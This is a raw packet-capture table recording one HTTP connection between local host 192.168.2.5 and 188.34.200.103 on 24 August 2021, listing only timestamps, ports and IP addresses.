Aug 24, 2021 08:49:22.441757917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441773891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441838980 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441859007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.441864967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441883087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441934109 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.441943884 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.441961050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441982031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441998005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442015886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442033052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442049026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442028046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442065954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442068100 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442080021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442090034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442101002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442120075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442133904 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442137957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442151070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442167044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442174911 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442193031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442205906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442210913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442229033 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442245007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442248106 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442264080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442279100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442285061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442296982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442312002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442320108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442332029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442343950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442349911 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442367077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442383051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442401886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442403078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442420959 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442430019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442433119 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442441940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442466021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442468882 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442486048 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442501068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442517042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442524910 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442534924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.442543983 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442576885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.442606926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.462899923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.462924957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.462944984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.462961912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.462990999 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463056087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463079929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463104963 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463145018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463186026 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463206053 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463246107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463268995 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463294029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463315964 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463316917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463340998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463390112 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463413954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463414907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463438988 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463438988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463443041 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463460922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463464022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463485003 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463488102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463510036 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463531971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463540077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463546038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463555098 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463565111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463577032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463594913 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463597059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463614941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463619947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463640928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463658094 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463661909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463681936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463679075 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463702917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463723898 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463745117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463745117 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463767052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463777065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463819981 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463902950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463922024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463943005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463944912 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.463963985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463983059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.463985920 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464008093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464051008 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464056015 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464066982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464085102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464128971 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464212894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464237928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464260101 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464282990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464286089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464304924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464317083 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464327097 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464345932 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464361906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464376926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464391947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464402914 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464411020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464416027 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464426994 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464431047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464442015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464457035 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464459896 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464472055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464488029 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464526892 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464559078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464574099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464589119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464602947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464603901 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464617968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464632034 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464646101 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464649916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464665890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464679956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464704037 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464710951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464725018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464725971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464740992 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464745998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464756012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464771032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464788914 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464804888 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464811087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464869976 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.464874983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.464890003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465012074 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.465081930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465097904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465111971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465127945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465142012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465164900 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465179920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465193987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465209961 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.465233088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.465238094 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.465241909 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.465361118 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483206034 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483239889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483262062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483290911 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483315945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483326912 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483338118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483365059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483385086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483397007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483405113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483428001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483433008 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483449936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483455896 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483505964 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483781099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483808041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483829021 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483850002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483870983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483870029 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483891010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483911991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483932972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.483939886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483963013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483985901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.483988047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484010935 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484011889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484034061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484040976 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484056950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484078884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484081030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484102964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484106064 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484126091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484148026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484155893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484172106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484185934 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484195948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484219074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484241009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484260082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484261990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484282017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484297991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484318018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484318972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484343052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484357119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484381914 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484388113 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484405041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484425068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484445095 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484467983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484467030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484477997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484488010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484508038 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484525919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484540939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484549999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484555960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484565020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.484574080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.484714985 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.486371040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.486407042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.486464977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.486495972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.486612082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.486706018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.486802101 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.486860991 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.486959934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.486985922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487013102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487040997 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487071037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487076998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487102032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487145901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487166882 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487169981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487178087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487193108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487216949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487236023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487260103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487282991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487293005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487303972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487309933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487309933 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487338066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487366915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487374067 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487382889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487391949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487421989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487445116 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487445116 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487452984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487469912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487492085 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487493038 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487520933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487548113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487555027 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487564087 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487571955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487638950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487674952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487706900 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487715006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487734079 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487736940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487771034 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487797976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487809896 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487824917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487824917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487831116 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487837076 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487859011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487895012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487926960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487936020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487947941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.487962961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.487988949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488009930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488015890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488022089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488033056 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488039017 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488042116 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488070011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488095045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488118887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488131046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488132000 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.488141060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.488147974 CEST	49718	80	192.168.2.5	188.34.200.103
